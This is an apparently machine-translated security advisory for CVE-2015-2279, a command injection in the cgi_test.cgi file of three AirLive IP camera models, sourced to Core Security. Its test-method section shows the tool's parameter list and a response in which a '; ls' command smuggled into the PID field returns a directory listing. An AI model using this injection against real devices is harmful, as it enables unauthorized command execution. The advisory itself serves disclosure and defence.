AirLive IP monitor Command Injection Vulnerability (CVE-2015-2279)
AirLive IP monitor Command Injection Vulnerability (CVE-2015-2279)
Release date:
Updated on:
Affected Systems:
Airlive IP Cameras MD-3025
Airlive IP Cameras BU-3026
Airlive IP Cameras BU-2015
Description:
CVE (CAN) ID: CVE-2015-2279
Airlive is an IP monitoring network solution provider and security product vendor.
An OS command injection vulnerability exists in the cgi_test.cgi binary file when the AirLive MD-3025, BU-3026, and BU-2015 camera processes certain parameters, which attackers send a constructor request to the file, attackers can exploit this vulnerability to inject arbitrary commands.
<* Source: Core Security
Link: http://www.securityfocus.com/archive/1/535938
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
-C => set system MAC address
-M [MAC] => write MAC address
-N [Model Name] => write Model Name
-H [HW Version] => write HW Version
-V [Firmware Version] => write Firmware Version
-S [SN] => write SN
-T [TAN] => write TAN
-D [PID] => write PID
-R [CR] => write Country Region
-P => show current info.
Content-type: text/html
<Body> WRITE_TAN OK, PID =; ls & ls % 20-
</Body> 485. htm
SStreamVideo. cab
Ado.htm
Cfgupgrade. cgi
Cgi_test.cgi
Client.htm
Default.htm
Default_else.htm
Default_ie.htm
Default_m.htm
Default_nets.htm
[...]
Suggestion:
Vendor patch:
Airlive
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.airlivesecurity.com/
[1] http://www.airlive.com.
Http://www.airlive.com/product/BU-2015.
Http://www.airlive.com/product/MD-3025.
Http://www.airlive.com/product/BU-3026.
Http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf.
[6] http://www.airlivesecurity.com/product.php? Id = 5 #.
This article permanently updates the link address: